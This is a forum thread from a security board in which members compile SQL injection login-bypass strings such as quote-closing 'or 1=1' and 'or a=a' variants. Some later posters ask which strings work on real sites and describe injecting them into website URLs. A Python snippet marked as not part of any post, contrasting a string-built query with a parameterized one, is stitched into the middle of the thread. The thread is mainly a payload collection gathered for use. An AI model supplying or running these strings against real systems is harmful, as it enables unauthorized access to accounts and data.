Government Security
Network Security Resources


Sql Injection Strings!


10 replies to this topic

#1 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 01:16 PM

OK, well, I'm really starting to dabble in SQL injection, and I need more strings; I'm trying to make a sort of combo list... If you all post what you've got, I'll make one big list and post it on the board. If you don't know what you're doing, don't post.... Or alternatively, post methods used to find new strings...

List so far:

admin'--
' or 1=1--
'" or 1=1--
' union select 1, 'Eyeless', 'ez2do', 1--
admin'--
administrator'--
superuser'--
test'--
' or 0=0 --
' or 0=0 --'
' or 0=0 #
" or 0=0 --
" or 0=0 --'
'" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
" or 1=1--
or 1=1--
' or a=a--'
' or a=a #
' or a=a--
' or "a"="a
' or 'a'='a
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a

#2 Blake

Blake

    Former Commander In Chief

  • Retired Admin
  • 7,334 posts

Posted 14 April 2004 - 01:54 PM

Have you seen the list Comsec compiled in his SQL injection tutorial?

#3 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 14 April 2004 - 02:09 PM

I think gsecur was referring to this:
http://www.governmen...&st=0


#4 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 02:15 PM

I have, but as the description shows, "I WANT MORE!" I know there are more, as he says "the list below is a sample of the most common used". The above list was made from various tuts... along with new combos of old strings re-ordered..
Also, I noticed you add ' hi" or 1=1 -- '. Would changing the word have any effect? Maybe trying common usernames?

#5 Logan

Logan

    Specialist

  • Sergeant Major
  • 1,596 posts

Posted 14 April 2004 - 02:25 PM

It's SQL... usually if you want to use a vulnerability (open source), you have to learn the language.
SQL is simple; learn how exactly it gets read and other possibilities of doing it... then you could make your own!

example
" or "a"="a
') or ('a'='a

On some databases one would work, the other wouldn't.. The first one would enclose the username (or pass) in quotes... first it would CLOSE the quotes (making it "") and then says.. or "a"="a.. the last quote would be closing the final a.. and "a"="a" is always true, so that would be how it works.
However, the second uses ('Username').. and changing it to say "('') or ('a'='a')"

So to answer your question, YES, another word can be put in....
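
Added example, not part of any post in this thread: the quoting behaviour described in the reply above, reproduced against an in-memory SQLite database, with the string-built query next to the same query using a bound parameter. The `users` table, its two rows, and the function names are constructed for illustration, and the single-quote variants of the two strings (both in the list in the first post) are used.

```python
import sqlite3

# Two ways an application might wrap the value, matching the two cases in the post.
TEMPLATES = {
    "quoted": "SELECT name FROM users WHERE name = '{}'",
    "paren":  "SELECT name FROM users WHERE name = ('{}')",
}
# The two strings discussed in the post, single-quote variants.
STRINGS = ["' or 'a'='a", "') or ('a'='a"]

def make_db():
    """Constructed sample data: two accounts in an in-memory SQLite database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT)")
    db.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])
    return db

def lookup_concat(db, template, value):
    """Vulnerable form: the value is pasted into the SQL text, so its quotes
    become part of the statement. Returns the row count or 'syntax error'."""
    try:
        return len(db.execute(TEMPLATES[template].format(value)).fetchall())
    except sqlite3.OperationalError:
        return "syntax error"

def lookup_param(db, template, value):
    """Hardened form: same query shape, value passed as a bound parameter,
    so it is only ever compared as data."""
    sql = TEMPLATES[template].replace("'{}'", "?")
    return len(db.execute(sql, (value,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    for t in TEMPLATES:
        for s in STRINGS:
            print(f"{t:7} {s!r:18} concat={lookup_concat(db, t, s)!s:13} "
                  f"bound={lookup_param(db, t, s)}")
```

Each string only alters the string-built query whose quoting it happens to match, while the bound-parameter form returns no rows for either string and still finds `alice` by name.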


#6 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 14 April 2004 - 02:32 PM

I c I c, SQL will be learned; however, I probably ain't going to get too far into it, so again, if you have any different strings please post!

#7 Eyeless

Eyeless

    Specialist

  • Members
  • 143 posts

Posted 18 April 2004 - 02:15 PM

<_< <_< <_< :huh: :o :( :angry:
No one's postin', wait, oooo, damn, nope, *pissed*

#8 MonikaLec

MonikaLec

    Private

  • Members
  • 1 posts

Posted 17 April 2012 - 04:54 AM

Hello,
Below I am giving you the link to the teaser of a new Hakin9 Magazine in which the main topic is SQL Injection. To download it you have to register for a free account.
Here is the link: http://hakin9.org/wp...load.php?id=221 I hope it is helpful.

#9 TerminalX

TerminalX

    Private

  • Members
  • 2 posts

Posted 27 June 2012 - 05:18 AM

Well, I appreciate your effort regarding this, but have you tried these strings yourself to know which of them work and which of them don't? Personally, I am grabbing the strings that I assure to work in a real-world environment, not in a LAB etc. Can you please tell me which ones you tried and they worked?

#10 acu281

acu281

    Private

  • Members
  • 2 posts

Posted 08 March 2013 - 08:53 PM

Well, I appreciate your effort regarding this, but have you tried these strings yourself to know which of them work and which of them don't? Personally, I am grabbing the strings that I assure to work in a real-world environment, not in a LAB etc. Can you please tell me which ones you tried and they worked?

tnx 4 guide

No, I don't try all of them,

because I don't wanna hack a website or fetch information and like this.

Actually I work on the first step of SQL Injection hacking, and need to test a website to understand whether that website is vulnerable or not.

I collected my strings from a forum, and my software takes those strings and injects them into the website URL after '?'

plz help!

tnx :)



#11 acu281

acu281

    Private

  • Members
  • 2 posts

Posted 08 March 2013 - 09:09 PM

LOOOOOOOOOOOOOOL wrong post :))))

but no matter,

like Eyeless, I'm working on SQL injection and I think we have the same problem





